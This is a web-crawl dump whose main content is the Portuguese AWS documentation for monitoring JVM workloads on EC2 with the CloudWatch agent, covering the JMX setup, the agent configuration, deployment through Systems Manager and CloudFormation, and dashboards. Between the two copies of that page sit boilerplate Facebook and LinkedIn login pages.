CloudWatch em uma ou mais instâncias do EC2 usando uma pilha do CloudFormation. Etapa 4: verificar se a configuração do agente foi realizada corretamente. Etapa 1: garantir que as instâncias do EC2 de destino têm as permissões do IAM necessárias Você deve conceder permissão para o Systems Manager instalar e configurar o agente do CloudWatch. Além disso, é necessário conceder permissão para que o agente do CloudWatch publique a telemetria da instância do EC2 para o CloudWatch. Certifique-se de que o perfil do IAM anexado à instância tenha as políticas do IAM CloudWatchAgentServerPolicy e AmazonSSMManagedInstanceCore associadas. Após criar o perfil, associe-o às suas instâncias do EC2. Siga as etapas apresentadas em Launch an instance with an IAM role para anexar um perfil durante a inicialização de uma nova instância do EC2. Para anexar um perfil a uma instância do EC2 existente, siga as etapas apresentadas em Attach an IAM role to an instance . Etapa 2: armazenar o arquivo de configuração recomendado do agente do CloudWatch no Systems Manager Parameter Store O Parameter Store simplifica a instalação do agente do CloudWatch em uma instância do EC2 ao armazenar e gerenciar os parâmetros de configuração de forma segura, eliminando a necessidade de valores com codificação rígida. Isso garante um processo de implantação mais seguro e flexível ao possibilitar o gerenciamento centralizado e as atualizações simplificadas para as configurações em diversas instâncias. Use as etapas apresentadas a seguir para armazenar o arquivo de configuração recomendado do agente do CloudWatch como um parâmetro no Parameter Store. Como criar o arquivo de configuração do agente do CloudWatch como um parâmetro Abra o console AWS Systems Manager em https://console.aws.amazon.com/systems-manager/ . No painel de navegação, escolha Gerenciamento de aplicações e, em seguida, Parameter Store . Siga as etapas apresentadas a seguir para criar um novo parâmetro para a configuração. Escolha Criar Parâmetro . Na caixa Nome , insira um nome que será usado para referenciar o arquivo de configuração do agente do CloudWatch nas etapas posteriores. Por exemplo, . AmazonCloudWatch-JVM-Configuration (Opcional) Na caixa Descrição , digite uma descrição para o parâmetro. Em Camadas de parâmetros , escolha Padrão . Para Tipo , escolha String . Em Tipo de dados , selecione texto . Na caixa Valor , cole o bloco em JSON correspondente que foi listado em Configuração do agente para hosts da JVM . Certifique-se de personalizar o valor da dimensão de agrupamento e o número da porta, conforme descrito. Escolha Criar Parâmetro . Etapa 3: instalar o agente do CloudWatch e aplicar a configuração usando um modelo do CloudFormation É possível usar o AWS CloudFormation para instalar o agente e configurá-lo para usar a configuração do agente do CloudWatch criada nas etapas anteriores. Como instalar e configurar o agente do CloudWatch para esta solução Abra o assistente para criar pilha de forma rápida do CloudFormation usando este link: https://console.aws.amazon.com/cloudformation/home?#/stacks/quickcreate?templateURL=https://aws-observability-solutions-prod-us-east-1.s3.us-east-1.amazonaws.com/CloudWatchAgent/CFN/v1.0.0/cw-agent-installation-template-1.0.0.json . Verifique se a região selecionada no console corresponde à região em que a workload da JVM está em execução. Em Nome da pilha , insira um nome para identificar esta pilha, como CWAgentInstallationStack . Na seção Parâmetros , especifique o seguinte: Para CloudWatchAgentConfigSSM , insira o nome do parâmetro do Systems Manager para a configuração do agente que você criou anteriormente, como AmazonCloudWatch-JVM-Configuration . Para selecionar as instâncias de destino, você tem duas opções. Para InstanceIds , especifique uma lista delimitada por vírgulas de IDs de instâncias nas quais você deseja instalar o agente do CloudWatch com esta configuração. É possível listar uma única instância ou várias instâncias. Se você estiver realizando implantações em grande escala, é possível especificar a TagKey e o TagValue correspondente para direcionar todas as instâncias do EC2 associadas a essa etiqueta e a esse valor. Se você especificar uma TagKey , é necessário especificar um TagValue correspondente. (Para um grupo do Auto Scaling, especifique aws:autoscaling:groupName para a TagKey e defina o nome do grupo do Auto Scaling para a TagValue para realizar a implantação em todas as instâncias do grupo do Auto Scaling.) Caso você especifique tanto os parâmetros InstanceIds quanto TagKeys , InstanceIds terá precedência, e as etiquetas serão desconsideradas. Analise as configurações e, em seguida, escolha Criar pilha . Se você desejar editar o arquivo de modelo previamente para personalizá-lo, selecione a opção Fazer upload de um arquivo de modelo no Assistente de criação de pilha para fazer o upload do modelo editado. Para obter mais informações, consulte Criar uma pilha no console do CloudFormation . É possível usar o seguinte link para fazer download do modelo: https://aws-observability-solutions-prod-us-east-1.s3.us-east-1.amazonaws.com/CloudWatchAgent/CFN/v1.0.0/cw-agent-installation-template-1.0.0.json . nota Após a conclusão desta etapa, este parâmetro do Systems Manager será associado aos agentes do CloudWatch em execução nas instâncias de destino. Isto significa que: Se o parâmetro do Systems Manager for excluído, o agente será interrompido. Se o parâmetro do Systems Manager for editado, as alterações de configuração serão aplicadas automaticamente ao agente na frequência programada, que, por padrão, é de 30 dias. Se você desejar aplicar imediatamente as alterações a este parâmetro do Systems Manager, você deverá executar esta etapa novamente. Para obter mais informações sobre as associações, consulte Working with associations in Systems Manager . Etapa 4: verificar se a configuração do agente foi realizada corretamente É possível verificar se o agente do CloudWatch está instalado ao seguir as etapas apresentadas em Verificar se o atendente do CloudWatch está em execução . Se o agente do CloudWatch não estiver instalado e em execução, certifique-se de que todas as configurações foram realizadas corretamente. Certifique-se de ter anexado um perfil com as permissões adequadas para a instância do EC2, conforme descrito na Etapa 1: garantir que as instâncias do EC2 de destino têm as permissões do IAM necessárias . Certifique-se de ter configurado corretamente o JSON para o parâmetro do Systems Manager. Siga as etapas em Solução de problemas de instalação do atendente do CloudWatch com o CloudFormation . Se todas as configurações estiverem corretas, as métricas da JVM serão publicadas no CloudWatch e estarão disponíveis para visualização. É possível verificar no console do CloudWatch para assegurar que as métricas estão sendo publicadas corretamente. Como verificar se as métricas da JVM estão sendo publicadas no CloudWatch Abra o console do CloudWatch, em https://console.aws.amazon.com/cloudwatch/ . Escolha Métricas e, depois, Todas as métricas . Certifique-se de ter selecionado a região na qual a solução foi implantada, escolha Namespaces personalizados e, em seguida, selecione CWAgent . Pesquise pelas métricas mencionadas em Configuração do agente para hosts da JVM , como jvm.memory.heap.used . Caso encontre resultados para essas métricas, isso significa que elas estão sendo publicadas no CloudWatch. Criação de um painel para a solução da JVM O painel fornecido por esta solução apresenta métricas para a Java Virtual Machine (JVM) subjacente para o servidor. O painel fornece uma visão geral da JVM ao agregar e apresentar métricas de todas as instâncias, disponibilizando um resumo de alto nível sobre a integridade geral e o estado operacional. Além disso, o painel mostra um detalhamento dos principais colaboradores (que corresponde aos dez principais por widget de métrica) para cada métrica. Isso ajuda a identificar rapidamente discrepâncias ou instâncias que contribuem significativamente para as métricas observadas. O painel da solução não exibe métricas do EC2. Para visualizar as métricas relacionadas ao EC2, é necessário usar o painel automático do EC2 para acessar as métricas fornecidas diretamente pelo EC2 e usar o painel do console do EC2 para consultar as métricas do EC2 que são coletadas pelo agente do CloudWatch. Para obter mais informações sobre os painéis automáticos para serviços da AWS, consulte Visualização de um painel do CloudWatch para um único serviço da AWS . Para criar o painel, é possível usar as seguintes opções: Usar o console do CloudWatch para criar o painel. Usar o console do AWS CloudFormation para implantar o painel. Fazer o download do código de infraestrutura como código do AWS CloudFormation e integrá-lo como parte da automação de integração contínua (CI). Ao usar o console do CloudWatch para criar um painel, é possível visualizá-lo previamente antes de criá-lo e incorrer em custos. nota O painel criado com o CloudFormation nesta solução exibe métricas da região em que a solução está implantada. Certifique-se de que a pilha do CloudFormation seja criada na mesma região em que as métricas da JVM são publicadas. Se as métricas do agente do CloudWatch estiverem sendo publicadas em um namespace diferente de CWAgent (por exemplo, caso você tenha fornecido um namespace personalizado), será necessário alterar a configuração do CloudFormation para substituir CWAgent pelo namespace personalizado que você está usando. Como criar o painel usando o console do CloudWatch nota Atualmente, os painéis de soluções exibem métricas relacionadas à coleta de resíduos somente para o G1 Garbage Collector, que é o coletor padrão para as versões mais recentes do Java. Caso esteja usando um algoritmo de coleta de resíduos diferente, os widgets relacionados à coleta de resíduos estarão vazios. No entanto, você pode personalizar esses widgets alterando o modelo do painel do CloudFormation e aplicando o tipo de coleta de resíduos apropriado à dimensão do nome das métricas relacionadas à coleta de resíduos. Por exemplo, se você estiver usando a coleta de resíduos paralela, altere name=\"G1 Young Generation\" para name=\"Parallel GC\" da métrica de contagem de coleta de resíduos jvm.gc.collections.count . Abra o console do CloudWatch e acesse Criar painel usando este link: https://console.aws.amazon.com/cloudwatch/home?#dashboards?dashboardTemplate=JvmOnEc2&referrer=os-catalog . Verifique se a região selecionada no console corresponde à região em que a workload da JVM está em execução. Insira o nome do painel e, em seguida, escolha Criar painel . Para diferenciar este painel de painéis semelhantes em outras regiões com facilidade, recomendamos incluir o nome da região no nome do painel, por exemplo, JVMDashboard-us-east-1 . Visualize previamente o painel e escolha Salvar para criá-lo. Como criar o painel usando o CloudFormation Abra o assistente para criar pilha de forma rápida do CloudFormation usando este link: https://console.aws.amazon.com/cloudformation/home?#/stacks/quickcreate?templateURL=https://aws-observability-solutions-prod-us-east-1.s3.us-east-1.amazonaws.com/JVM_EC2/CloudWatch/CFN/v1.0.0/dashboard-template-1.0.0.json . Verifique se a região selecionada no console corresponde à região em que a workload da JVM está em execução. Em Nome da pilha , insira um nome para identificar esta pilha, como JVMDashboardStack . Na seção Parâmetros , especifique o nome do painel no parâmetro DashboardName . Para diferenciar este painel de painéis semelhantes em outras regiões com facilidade, recomendamos incluir o nome da região no nome do painel, por exemplo, JVMDashboard-us-east-1 . Confirme as funcionalidades de acesso relacionadas às transformações na seção Capacidades e transformações . Lembre-se de que o CloudFormation não adiciona recursos do IAM. Analise as configurações e, em seguida, escolha Criar pilha . Quando o status da pilha mostrar CREATE_COMPLETE , selecione a guia Recursos na pilha criada e, em seguida, escolha o link exibido em ID físico para acessar o painel. Como alternativa, é possível acessar o painel diretamente no console do CloudWatch ao selecionar Painéis no painel de navegação do console à esquerda e localizar o nome do painel na seção Painéis personalizados . Se você desejar editar o arquivo de modelo para personalizá-lo para atender a uma necessidade específica, é possível usar a opção Fazer upload de um arquivo de modelo no Assistente de criação de pilha para fazer o upload do modelo editado. Para obter mais informações, consulte Criar uma pilha no console do CloudFormation . É possível usar este link para fazer download do modelo: https://aws-observability-solutions-prod-us-east-1.s3.us-east-1.amazonaws.com/JVM_EC2/CloudWatch/CFN/v1.0.0/dashboard-template-1.0.0.json . nota Atualmente, os painéis de soluções exibem métricas relacionadas à coleta de resíduos somente para o G1 Garbage Collector, que é o coletor padrão para as versões mais recentes do Java. Caso esteja usando um algoritmo de coleta de resíduos diferente, os widgets relacionados à coleta de resíduos estarão vazios. No entanto, você pode personalizar esses widgets alterando o modelo do painel do CloudFormation e aplicando o tipo de coleta de resíduos apropriado à dimensão do nome das métricas relacionadas à coleta de resíduos. Por exemplo, se você estiver usando a coleta de resíduos paralela, altere name=\"G1 Young Generation\" para name=\"Parallel GC\" da métrica de contagem de coleta de resíduos jvm.gc.collections.count . Como começar a usar o painel da JVM A seguir, apresentamos algumas tarefas que você pode realizar para explorar o novo painel da JVM. Essas tarefas permitem a validação do funcionamento correto do painel e fornecem uma experiência prática ao usá-lo para monitorar um grupo de processos da JVM. À medida que realiza as tarefas, você se familiarizará com a navegação no painel e com a interpretação das métricas visualizadas. Seleção de um grupo de processos Use a lista suspensa Nome do grupo de processos da JVM para selecionar o grupo de processos que você deseja monitorar. O painel será atualizado automaticamente para exibir as métricas para o grupo de processos selecionado. Caso você tenha várias aplicações ou ambientes em Java, cada um pode ser representado como um grupo de processos distinto. Selecionar o grupo de processos apropriado garante que você estará visualizando as métricas específicas para a aplicação ou para o ambiente que deseja analisar. Análise do uso de memória Na seção de visão geral do painel, localize os widgets de Porcentagem de uso de memória do heap e de Porcentagem de uso de memória não relacionada ao heap . Os widgets mostram a porcentagem de memória do heap e de memória não relacionada ao heap usadas em todas as JVMs no grupo de processos selecionado. Uma porcentagem elevada pode indicar pressão da memória, o que pode resultar em problemas de performance ou exceções OutOfMemoryError . Além disso, é possível realizar uma busca detalhada do uso de memória do heap por host na seção Uso de memória por host para identificar os hosts com maior utilização. Análise de threads e de classes carregadas Na seção Threads e classes carregadas pelo host , localize os widgets Contagem dos dez principais threads e Dez principais classes carregadas . Procure por JVMs que tenham um número anormalmente elevado de threads ou de classes em comparação com as demais. Um número excessivo de threads pode ser indicativo de vazamentos de threads ou de simultaneidade excessiva, enquanto um grande número de classes carregadas pode indicar possíveis vazamentos no carregador de classes ou problemas com a geração ineficiente de classes dinâmicas. Identificação de problemas de coleta de resíduos Na seção de Coleta de resíduos , localize os widgets Dez principais invocações de coleta de resíduos por minuto e Dez principais duração da coleta de resíduos , separados pelos diferentes tipos de coletor de lixo: Recente , Simultânea e Mista . Procure por JVMs que tenham um número anormalmente elevado de coleções ou de durações longas de coleta em comparação com as demais. Isso pode indicar problemas de configuração ou vazamentos de memória. O Javascript está desativado ou não está disponível no seu navegador. Para usar a documentação da AWS, o Javascript deve estar ativado. Consulte as páginas de Ajuda do navegador para obter instruções. Convenções do documento Soluções de observabilidade do CloudWatch Workload do NGINX no EC2 Essa página foi útil? - Sim Obrigado por nos informar que estamos fazendo um bom trabalho! Se tiver tempo, conte-nos sobre o que você gostou para que possamos melhorar ainda mais. Essa página foi útil? - Não Obrigado por nos informar que precisamos melhorar a página. Lamentamos ter decepcionado você. Se tiver tempo, conte-nos como podemos melhorar a documentação. | 2026-01-13T09:29:26 |
https://l.facebook.com/l.php?u=https%3A%2F%2Fwww.instagram.com%2F&h=AT3BvsUO-hYp9PI2XEVKPZEWtE6RL_0gw_4SUdXDGGzAdNc_3A6wZYfcdmCXpvPbw7OyrQV6Rxf-kw_MB6CLwZ3qOu8CjAnVZiBsuHwU9piI9h3I7kOD4wrsh4ji45Bd-gj0YqoMpBZID1Js | Facebook Facebook 이메일 또는 휴대폰 비밀번호 계정을 잊으셨나요? 새 계정 만들기 일시적으로 차단됨 일시적으로 차단됨 회원님의 이 기능 사용 속도가 너무 빠른 것 같습니다. 이 기능 사용에서 일시적으로 차단되었습니다. Back 한국어 English (US) Tiếng Việt Bahasa Indonesia ภาษาไทย Español 中文(简体) 日本語 Português (Brasil) Français (France) Deutsch 가입하기 로그인 Messenger Facebook Lite 동영상 Meta Pay Meta 스토어 Meta Quest Ray-Ban Meta Meta AI Meta AI 콘텐츠 더 보기 Instagram Threads 투표 정보 센터 개인정보처리방침 개인정보 보호 센터 정보 광고 만들기 페이지 만들기 개발자 채용 정보 쿠키 AdChoices 이용 약관 고객 센터 연락처 업로드 및 비사용자 설정 활동 로그 Meta © 2026 | 2026-01-13T09:29:26 |
https://www.linkedin.com/uas/login?session_redirect=%2Fproducts%2Ftechnarts-monicat&trk=products_details_guest_primary_call_to_action | LinkedIn Login, Sign in | LinkedIn Sign in Sign in with Apple Sign in with a passkey By clicking Continue, you agree to LinkedIn’s User Agreement , Privacy Policy , and Cookie Policy . or Email or phone Password Show Forgot password? Keep me logged in Sign in We’ve emailed a one-time link to your primary email address Click on the link to sign in instantly to your LinkedIn account. If you don’t see the email in your inbox, check your spam folder. Resend email Back New to LinkedIn? Join now Agree & Join LinkedIn By clicking Continue, you agree to LinkedIn’s User Agreement , Privacy Policy , and Cookie Policy . LinkedIn © 2026 User Agreement Privacy Policy Community Guidelines Cookie Policy Copyright Policy Send Feedback Language العربية (Arabic) বাংলা (Bangla) Čeština (Czech) Dansk (Danish) Deutsch (German) Ελληνικά (Greek) English (English) Español (Spanish) فارسی (Persian) Suomi (Finnish) Français (French) हिंदी (Hindi) Magyar (Hungarian) Bahasa Indonesia (Indonesian) Italiano (Italian) עברית (Hebrew) 日本語 (Japanese) 한국어 (Korean) मराठी (Marathi) Bahasa Malaysia (Malay) Nederlands (Dutch) Norsk (Norwegian) ਪੰਜਾਬੀ (Punjabi) Polski (Polish) Português (Portuguese) Română (Romanian) Русский (Russian) Svenska (Swedish) తెలుగు (Telugu) ภาษาไทย (Thai) Tagalog (Tagalog) Türkçe (Turkish) Українська (Ukrainian) Tiếng Việt (Vietnamese) 简体中文 (Chinese (Simplified)) 正體中文 (Chinese (Traditional)) | 2026-01-13T09:29:26 |
https://www.linkedin.com/uas/login?session_redirect=%2Fservices%2Fproducts%2Ftechnarts-monicat%2F&fromSignIn=true&trk=products_details_guest_nav-header-signin | LinkedIn Login, Sign in | LinkedIn Sign in Sign in with Apple Sign in with a passkey By clicking Continue, you agree to LinkedIn’s User Agreement , Privacy Policy , and Cookie Policy . or Email or phone Password Show Forgot password? Keep me logged in Sign in We’ve emailed a one-time link to your primary email address Click on the link to sign in instantly to your LinkedIn account. If you don’t see the email in your inbox, check your spam folder. Resend email Back New to LinkedIn? Join now Agree & Join LinkedIn By clicking Continue, you agree to LinkedIn’s User Agreement , Privacy Policy , and Cookie Policy . LinkedIn © 2026 User Agreement Privacy Policy Community Guidelines Cookie Policy Copyright Policy Send Feedback Language العربية (Arabic) বাংলা (Bangla) Čeština (Czech) Dansk (Danish) Deutsch (German) Ελληνικά (Greek) English (English) Español (Spanish) فارسی (Persian) Suomi (Finnish) Français (French) हिंदी (Hindi) Magyar (Hungarian) Bahasa Indonesia (Indonesian) Italiano (Italian) עברית (Hebrew) 日本語 (Japanese) 한국어 (Korean) मराठी (Marathi) Bahasa Malaysia (Malay) Nederlands (Dutch) Norsk (Norwegian) ਪੰਜਾਬੀ (Punjabi) Polski (Polish) Português (Portuguese) Română (Romanian) Русский (Russian) Svenska (Swedish) తెలుగు (Telugu) ภาษาไทย (Thai) Tagalog (Tagalog) Türkçe (Turkish) Українська (Ukrainian) Tiếng Việt (Vietnamese) 简体中文 (Chinese (Simplified)) 正體中文 (Chinese (Traditional)) | 2026-01-13T09:29:26 |
https://www.linkedin.com/checkpoint/lg/login?session_redirect=%2Fproducts%2Fhashicorp-terraform&fromSignIn=true&trk=products_details_guest_secondary_call_to_action | LinkedIn Login, Sign in | LinkedIn Sign in Sign in with Apple Sign in with a passkey By clicking Continue, you agree to LinkedIn’s User Agreement , Privacy Policy , and Cookie Policy . or Email or phone Password Show Forgot password? Keep me logged in Sign in We’ve emailed a one-time link to your primary email address Click on the link to sign in instantly to your LinkedIn account. If you don’t see the email in your inbox, check your spam folder. Resend email Back New to LinkedIn? Join now Agree & Join LinkedIn By clicking Continue, you agree to LinkedIn’s User Agreement , Privacy Policy , and Cookie Policy . LinkedIn © 2026 User Agreement Privacy Policy Community Guidelines Cookie Policy Copyright Policy Send Feedback Language العربية (Arabic) বাংলা (Bangla) Čeština (Czech) Dansk (Danish) Deutsch (German) Ελληνικά (Greek) English (English) Español (Spanish) فارسی (Persian) Suomi (Finnish) Français (French) हिंदी (Hindi) Magyar (Hungarian) Bahasa Indonesia (Indonesian) Italiano (Italian) עברית (Hebrew) 日本語 (Japanese) 한국어 (Korean) मराठी (Marathi) Bahasa Malaysia (Malay) Nederlands (Dutch) Norsk (Norwegian) ਪੰਜਾਬੀ (Punjabi) Polski (Polish) Português (Portuguese) Română (Romanian) Русский (Russian) Svenska (Swedish) తెలుగు (Telugu) ภาษาไทย (Thai) Tagalog (Tagalog) Türkçe (Turkish) Українська (Ukrainian) Tiếng Việt (Vietnamese) 简体中文 (Chinese (Simplified)) 正體中文 (Chinese (Traditional)) | 2026-01-13T09:29:26 |
https://docs.aws.amazon.com/pt_br/AmazonCloudWatch/latest/monitoring/Solution-JVM-On-EC2.html#Solution-JVM-Agent-Config | Solução do CloudWatch: workload da JVM no Amazon EC2 - Amazon CloudWatch Solução do CloudWatch: workload da JVM no Amazon EC2 - Amazon CloudWatch Documentação Amazon CloudWatch Guia do usuário Requisitos Benefícios Custos Configuração do agente do CloudWatch para esta solução Implantação do agente para a sua solução Criação de um painel para a solução da JVM Solução do CloudWatch: workload da JVM no Amazon EC2 Esta solução auxilia na configuração da coleta de métricas prontas para uso com agentes do CloudWatch para aplicações da JVM que estão sendo executadas em instâncias do EC2. Além disso, a solução ajuda na configuração de um painel do CloudWatch configurado previamente. Para obter informações gerais sobre todas as soluções de observabilidade do CloudWatch, consulte Soluções de observabilidade do CloudWatch . Tópicos Requisitos Benefícios Custos Configuração do agente do CloudWatch para esta solução Implantação do agente para a sua solução Criação de um painel para a solução da JVM Requisitos Esta solução é aplicável nas seguintes condições: Versões compatíveis: versões LTS do Java 8, 11, 17 e 21 Computação: Amazon EC2 Fornecimento de suporte para até 500 instâncias do EC2 em todas as workloads da JVM em uma Região da AWS específica Versão mais recente do agente do CloudWatch SSM Agent instalado na instância do EC2 nota O AWS Systems Manager (SSM Agent) está instalado previamente em algumas imagens de máquinas da Amazon (AMIs) fornecidas pela AWS e por entidades externas confiáveis. Se o agente não estiver instalado, você poderá instalá-lo manualmente usando o procedimento adequado para o seu tipo de sistema operacional. Instalar e desinstalar o SSM Agent manualmente em instâncias do EC2 para Linux Instalar e desinstalar o SSM Agent manualmente em instâncias do EC2 para macOS Instalar e desinstalar o SSM Agent manualmente em instâncias do EC2 para Windows Server Benefícios A solução disponibiliza monitoramento da JVM, fornecendo insights valiosos para os seguintes casos de uso: Monitoramento do uso de memória do heap e de memória não relacionada ao heap da JVM. Análise de threads e de carregamento de classes para identificar problemas de simultaneidade. Rastreamento da coleta de resíduos para identificar possíveis vazamentos de memória. Alternância entre diferentes aplicações da JVM configuradas pela solução na mesma conta. A seguir, apresentamos as principais vantagens da solução: Automatiza a coleta de métricas para a JVM usando a configuração do agente do CloudWatch, o que elimina a necessidade de instrumentação manual. Fornece um painel do CloudWatch consolidado e configurado previamente para as métricas da JVM. O painel gerenciará automaticamente as métricas das novas instâncias do EC2 para a JVM que foram configuradas usando a solução, mesmo que essas métricas não estejam disponíveis no momento de criação do painel. Além disso, o painel permite agrupar as métricas em aplicações lógicas para facilitar o foco e o gerenciamento. A imagem apresentada a seguir é um exemplo do painel para esta solução. Custos Esta solução cria e usa recursos em sua conta. A cobrança será realizada com base no uso padrão, que inclui o seguinte: Todas as métricas coletadas pelo agente do CloudWatch são cobradas como métricas personalizadas. O número de métricas usadas por esta solução depende do número de hosts do EC2. Cada host da JVM configurado para a solução publica um total de 18 métricas, além de uma métrica ( disk_used_percent ) cuja contagem de métricas depende do número de caminhos fornecidos para o host. Um painel personalizado. As operações da API solicitadas pelo agente do CloudWatch para publicar as métricas. Com a configuração padrão para esta solução, o agente do CloudWatch chama a operação PutMetricData uma vez por minuto para cada host do EC2. Isso significa que a API PutMetricData será chamada 30*24*60=43,200 em um mês com 30 dias para cada host do EC2. Para obter mais informações sobre os preços do CloudWatch, consulte Preço do Amazon CloudWatch . A calculadora de preços pode ajudar a estimar os custos mensais aproximados para o uso desta solução. Como usar a calculadora de preços para estimar os custos mensais da solução Abra a calculadora de preços do Amazon CloudWatch . Em Escolher uma região , selecione a região em que você gostaria de implantar a solução. Na seção Métricas , em Número de métricas , insira (18 + average number of disk paths per EC2 host) * number of EC2 instances configured for this solution . Na seção APIs , em Número de solicitações de API , insira 43200 * number of EC2 instances configured for this solution . Por padrão, o agente do CloudWatch executa uma operação PutMetricData a cada minuto para cada host do EC2. Na seção Painéis e alarmes , em Número de painéis , insira 1 . É possível visualizar os custos mensais estimados na parte inferior da calculadora de preços. Configuração do agente do CloudWatch para esta solução O agente do CloudWatch é um software que opera de maneira contínua e autônoma em seus servidores e em ambientes com contêineres. Ele coleta métricas, logs e rastreamentos da infraestrutura e das aplicações e os envia para o CloudWatch e para o X-Ray. Para obter mais informações sobre o agente do CloudWatch, consulte Coleta de métricas, logs e rastreamentos usando o agente do CloudWatch . A configuração do agente nesta solução coleta as métricas fundamentais para a solução. O agente do CloudWatch pode ser configurado para coletar mais métricas da JVM do que as que são exibidas por padrão no painel. Para obter uma lista de todas as métricas da JVM que você pode coletar, consulte Coletar métricas da JVM . Para obter informações gerais sobre a configuração do agente do CloudWatch, consulte Métricas coletadas pelo atendente do CloudWatch . Exposição de portas do JMX para a aplicação da JVM O agente do CloudWatch depende do JMX para coletar as métricas relacionadas ao processo da JVM. Para que isso aconteça, é necessário expor a porta do JMX da aplicação da JVM. As instruções para expor a porta do JMX dependem do tipo de workload que você está usando para a aplicação da JVM. Consulte a documentação específica para a aplicação para encontrar essas instruções. De maneira geral, para habilitar uma porta do JMX para monitoramento e gerenciamento, você precisa configurar as propriedades do sistema apresentadas a seguir para a aplicação da JVM. Certifique-se de especificar um número de porta que não esteja em uso. O exemplo apresentado a seguir configura o JMX sem autenticação. Se suas políticas ou seus requisitos de segurança exigirem que você habilite o JMX com autenticação por senha ou SSL para a obtenção de acesso remoto, consulte a documentação do JMX para definir a propriedade necessária. -Dcom.sun.management.jmxremote -Dcom.sun.management.jmxremote.port= port-number -Dcom.sun.management.jmxremote.authenticate=false -Dcom.sun.management.jmxremote.ssl=false Analise os scripts de inicialização e os arquivos de configuração da aplicação para encontrar o local mais adequado para adicionar esses argumentos. Quando você executar um arquivo .jar usando a linha de comando, o comando pode ser semelhante ao apresentado a seguir, em que pet-search.jar é o nome do arquivo JAR da aplicação. $ java -jar -Dcom.sun.management.jmxremote -Dcom.sun.management.jmxremote.port=9999 -Dcom.sun.management.jmxremote.authenticate=false -Dcom.sun.management.jmxremote.ssl=false pet-search.jar Configuração do agente para esta solução As métricas coletadas pelo agente são definidas na configuração do agente. A solução fornece configurações do agente para a coleta das métricas recomendadas com dimensões adequadas para o painel da solução. As etapas para a implantação da solução são descritas posteriormente em Implantação do agente para a sua solução . As informações apresentadas a seguir são destinadas a ajudar você a compreender como personalizar a configuração do agente para o seu ambiente. Você deve personalizar algumas partes da seguinte configuração do agente para o seu ambiente: O número da porta do JMX corresponde ao número da porta que você configurou na seção anterior desta documentação. Esse número está na linha endpoint na configuração. ProcessGroupName : forneça nomes significativos para a dimensão ProcessGroupName . Esses nomes devem representar o agrupamento de clusters, de aplicações ou de serviços para as instâncias do EC2 que executam aplicações ou processos semelhantes. Isso auxilia no agrupamento de métricas de instâncias que pertencem ao mesmo grupo de processos da JVM, proporcionando uma visão unificada da performance do cluster, da aplicação e do serviço no painel da solução. Por exemplo, caso você tenha duas aplicações em Java em execução na mesma conta, sendo uma para a aplicação order-processing e a outra para a aplicação inventory-management , é necessário configurar as dimensões ProcessGroupName de maneira adequada na configuração do agente de cada instância. Para as instâncias da aplicação order-processing , defina ProcessGroupName=order-processing . Para as instâncias da aplicação inventory-management , defina ProcessGroupName=inventory-management . Ao seguir essas diretrizes, o painel da solução agrupará automaticamente as métricas com base na dimensão ProcessGroupName . O painel incluirá opções do menu suspenso para a seleção e para a visualização de métricas de um grupo de processos específico, permitindo o monitoramento da performance de grupos de processos individuais separadamente. Configuração do agente para hosts da JVM Use a configuração do agente do CloudWatch apresentada a seguir nas instâncias do EC2 em que as aplicações em Java estão implantadas. A configuração será armazenada como um parâmetro no Parameter Store do SSM, conforme detalhado posteriormente em Etapa 2: armazenar o arquivo de configuração recomendado do agente do CloudWatch no Systems Manager Parameter Store . Substitua ProcessGroupName pelo nome do grupo de processos. Substitua port-number pelo número da porta do JMX da aplicação em Java. Se o JMX tiver sido habilitado com autenticação por senha ou SSL para acesso remoto, consulte Coletar métricas do Java Management Extensions (JMX) para obter informações sobre como configurar o TLS ou a autorização na configuração do agente, conforme necessário. As métricas do EC2 mostradas nesta configuração (configuração apresentada de forma externa ao bloco do JMX) funcionam somente para instâncias do Linux e do macOS. Caso esteja usando instâncias do Windows, é possível optar por omitir essas métricas na configuração. Para obter mais informações sobre as métricas coletadas em instâncias do Windows, consulte Métricas coletadas pelo atendente do CloudWatch em instâncias do Windows Server . { "metrics": { "namespace": "CWAgent", "append_dimensions": { "InstanceId": "$ { aws:InstanceId}" }, "metrics_collected": { "jmx": [ { "endpoint": "localhost: port-number ", "jvm": { "measurement": [ "jvm.classes.loaded", "jvm.gc.collections.count", "jvm.gc.collections.elapsed", "jvm.memory.heap.committed", "jvm.memory.heap.max", "jvm.memory.heap.used", "jvm.memory.nonheap.committed", "jvm.memory.nonheap.max", "jvm.memory.nonheap.used", "jvm.threads.count" ] }, "append_dimensions": { "ProcessGroupName": " ProcessGroupName " } } ], "disk": { "measurement": [ "used_percent" ] }, "mem": { "measurement": [ "used_percent" ] }, "swap": { "measurement": [ "used_percent" ] }, "netstat": { "measurement": [ "tcp_established", "tcp_time_wait" ] } } } } Implantação do agente para a sua solução Existem várias abordagens para instalar o agente do CloudWatch, dependendo do caso de uso. Recomendamos o uso do Systems Manager para esta solução. Ele fornece uma experiência no console e simplifica o gerenciamento de uma frota de servidores gerenciados em uma única conta da AWS. As instruções apresentadas nesta seção usam o Systems Manager e são destinadas para situações em que o agente do CloudWatch não está em execução com as configurações existentes. É possível verificar se o agente do CloudWatch está em execução ao seguir as etapas apresentadas em Verificar se o atendente do CloudWatch está em execução . Se você já estiver executando o agente do CloudWatch nos hosts do EC2 nos quais a workload está implantada e gerenciando as configurações do agente, pode pular as instruções apresentadas nesta seção e usar o mecanismo de implantação existente para atualizar a configuração. Certifique-se de combinar a configuração do agente da JVM com a configuração do agente existente e, em seguida, implante a configuração combinada. Se você estiver usando o Systems Manager para armazenar e gerenciar a configuração do agente do CloudWatch, poderá combinar a configuração com o valor do parâmetro existente. Para obter mais informações, consulte Managing CloudWatch agent configuration files . nota Ao usar o Systems Manager para implantar as configurações do agente do CloudWatch apresentadas a seguir, qualquer configuração existente do agente do CloudWatch nas suas instâncias do EC2 será substituída ou sobrescrita. É possível modificar essa configuração para atender às necessidades do ambiente ou do caso de uso específico. As métricas definidas nesta solução representam o requisito mínimo para o painel recomendado. O processo de implantação inclui as seguintes etapas: Etapa 1: garantir que as instâncias do EC2 de destino têm as permissões do IAM necessárias. Etapa 2: armazenar o arquivo de configuração recomendado do agente no Systems Manager Parameter Store. Etapa 3: instalar o agente do CloudWatch em uma ou mais instâncias do EC2 usando uma pilha do CloudFormation. Etapa 4: verificar se a configuração do agente foi realizada corretamente. Etapa 1: garantir que as instâncias do EC2 de destino têm as permissões do IAM necessárias Você deve conceder permissão para o Systems Manager instalar e configurar o agente do CloudWatch. Além disso, é necessário conceder permissão para que o agente do CloudWatch publique a telemetria da instância do EC2 para o CloudWatch. Certifique-se de que o perfil do IAM anexado à instância tenha as políticas do IAM CloudWatchAgentServerPolicy e 